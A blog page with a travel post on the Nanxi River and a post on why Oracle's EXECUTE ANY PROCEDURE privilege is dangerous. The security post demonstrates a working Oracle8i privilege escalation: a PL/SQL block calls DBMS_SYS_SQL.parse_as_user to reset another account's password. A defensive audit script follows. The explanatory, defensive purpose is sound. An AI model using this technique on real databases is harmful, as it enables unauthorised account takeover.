May 10, 2005
The Beauty of the Nanxi River
Author: eygle
Source: http://blog.eygle.com
A friend sent these pictures after the May Day holiday. I looked the place up and found that the Nanxi River is quite a famous spot:
The Nanxi River lies in Yongjia County in the north of Wenzhou, Zhejiang Province, with Yandang to the east, Wenzhou to the south, Xiandu to the west and Xianju to the north. The scenic area covers 625 square kilometres and is known as the "cradle of Chinese landscape painting". In 2002 the National Tourism Administration rated it a national 4A-level tourist area.
The Nanxi River blends natural scenery, pastoral landscapes and cultural sights, and is famous for its distinctive "clear water, unusual rocks, many waterfalls, ancient villages and beautiful riverside groves". Its crystal-clear water and its many well-preserved ancient villages stand out most. Tests show the water carries only one ten-thousandth of a gram of sediment per cubic metre, with a pH of 7, and experts have called it "the finest water under heaven". The ancient villages, laid out according to ideas such as "seven stars and eight dippers", "the four treasures of the study" and yin-yang geomancy, add still more to the river's charm.
The famous contemporary writer Wang Zengqi once declared aloud: "I can responsibly announce to the whole world: the Nanxi River is very beautiful!" His excitement was plain to see.
Posted by eygle at 2:10 PM | Comments (2)
Why is "EXECUTE ANY PROCEDURE" a dangerous PRIVILEGE?
Author: eygle
Source: http://blog.eygle.com
Tom has said more than once: All I need is "CREATE SESSION" and "EXECUTE ANY PROCEDURE" and I can totally do anything I want to in your database. So where does the danger of EXECUTE ANY PROCEDURE come from?
Let's look at the danger through an example.
1. Create the test users
$ sqlplus "/ as sysdba"

SQL*Plus: Release 8.1.7.0.0 - Production on Tue May 10 09:57:41 2005

(c) Copyright 2000 Oracle Corporation. All rights reserved.

Connected to:
Oracle8i Enterprise Edition Release 8.1.7.4.0 - 64bit Production
With the Partitioning option
JServer Release 8.1.7.4.0 - 64bit Production

SQL> create user hacker identified by hacker default tablespace users temporary
  2  tablespace temp;

User created.

SQL> grant create session to hacker;

Grant succeeded.

SQL> grant execute any procedure to hacker;

Grant succeeded.

SQL> create user loser identified by loser default tablespace users temporary
  2  tablespace temp;

User created.

SQL> grant connect to loser;

Grant succeeded.
2. Connect as the test user
Note that at this point the user hacker is able to see and execute the SYS-owned dbms_sys_sql package.
SQL> connect hacker/hacker
Connected.
SQL> desc sys.dbms_sys_sql
PROCEDURE BIND_ARRAY
 Argument Name                  Type                    In/Out Default?
 ------------------------------ ----------------------- ------ --------
 C                              NUMBER(38)              IN
 NAME                           VARCHAR2                IN
 N_TAB                          TABLE OF NUMBER         IN
PROCEDURE BIND_ARRAY
 Argument Name                  Type                    In/Out Default?
 ------------------------------ ----------------------- ------ --------
 C                              NUMBER(38)              IN
 NAME                           VARCHAR2                IN
 C_TAB                          TABLE OF VARCHAR2(2000) IN
....
PROCEDURE VARIABLE_VALUE_ROWID
 Argument Name                  Type                    In/Out Default?
 ------------------------------ ----------------------- ------ --------
 C                              NUMBER(38)              IN
 NAME                           VARCHAR2                IN
 VALUE                          ROWID                   OUT
3. What does this mean?
SQL> connect hacker/hacker
Connected.
SQL> DECLARE
  2     UID      NUMBER;
  3     sqltext  VARCHAR2 (100) := 'alter user loser identified by test';
  4     c        INTEGER;
  5  BEGIN
  6     c := SYS.DBMS_SYS_SQL.open_cursor ();
  7     SYS.DBMS_SYS_SQL.parse_as_user (c, sqltext, DBMS_SQL.native, 0);
  8     SYS.DBMS_SYS_SQL.close_cursor (c);
  9  END;
 10  /

PL/SQL procedure successfully completed.
Through DBMS_SYS_SQL.parse_as_user, hacker can have its statements parsed as another user and is free to do whatever it likes inside the database.
The password of user loser has been changed:
SQL> connect loser/loser
ERROR:
ORA-01017: invalid username/password; logon denied

Warning: You are no longer connected to ORACLE.
SQL> connect loser/test
Connected.
SQL>
4. Note the version
In fact this bug exists only in Oracle8i. From Oracle9i on, even holding the execute any procedure privilege is no longer enough to reach DBMS_SYS_SQL.
SQL> grant execute any procedure to test;

Grant succeeded.

Elapsed: 00:00:00.33
SQL> connect test/test
Connected.
SQL> desc dbms_sys_sql
ERROR:
ORA-04043: object dbms_sys_sql does not exist

SQL> desc sys.dbms_sys_sql
ERROR:
ORA-04043: object sys.dbms_sys_sql does not exist

SQL> select * from v$version;

BANNER
----------------------------------------------------------------
Oracle9i Enterprise Edition Release 9.2.0.4.0 - Production
PL/SQL Release 9.2.0.4.0 - Production
CORE    9.2.0.3.0       Production
TNS for Linux: Version 9.2.0.4.0 - Production
NLSRTL Version 9.2.0.4.0 - Production

Elapsed: 00:00:00.32
The Oracle world is also becoming safer.
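The practical takeaway for a DBA is to know who holds EXECUTE ANY PROCEDURE and whether that privilege can reach SYS-owned packages at all. The following audit script is an added example and is not part of the original post; it uses only the standard data-dictionary views (DBA_SYS_PRIVS, DBA_ROLE_PRIVS, DBA_USERS, DBA_TAB_PRIVS, V$PARAMETER) and must be run by a DBA. The last query checks the O7_DICTIONARY_ACCESSIBILITY initialisation parameter, which the post does not mention: it is the setting that decides whether "ANY" system privileges apply to objects in the SYS schema, and its default changed from TRUE in 8i to FALSE in 9i, which is what the 9i session above shows.

```sql
-- Added audit script (not from the original post). Run as a DBA.

-- 1. Users and roles that hold EXECUTE ANY PROCEDURE directly.
SELECT grantee, admin_option
  FROM dba_sys_privs
 WHERE privilege = 'EXECUTE ANY PROCEDURE'
 ORDER BY grantee;

-- 2. Users that receive the privilege indirectly through a role chain of any
--    depth: start from the roles found in query 1 and walk down the grants
--    until a real user (a row in DBA_USERS) is reached.
SELECT DISTINCT rp.grantee AS user_name
  FROM dba_role_privs rp
 WHERE rp.grantee IN (SELECT username FROM dba_users)
 START WITH rp.granted_role IN (SELECT grantee
                                  FROM dba_sys_privs
                                 WHERE privilege = 'EXECUTE ANY PROCEDURE')
 CONNECT BY PRIOR rp.grantee = rp.granted_role;

-- 3. Explicit object grants on the package itself. Anything returned here
--    is worth questioning: normal accounts have no reason to call it.
SELECT grantee, privilege
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'DBMS_SYS_SQL';

-- 4. Whether "ANY" privileges reach SYS-owned objects at all. A value of
--    TRUE reproduces the 8i behaviour shown above; FALSE (the 9i default)
--    is what made DBMS_SYS_SQL invisible to the test user.
SELECT name, value
  FROM v$parameter
 WHERE LOWER(name) = 'o7_dictionary_accessibility';
```

Queries 1 and 2 together give the complete list of accounts to review; if query 4 returns TRUE on a release that allows changing it, every account in that list is in the position hacker was in above.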
Posted by eygle at 10:19 AM | Comments (3)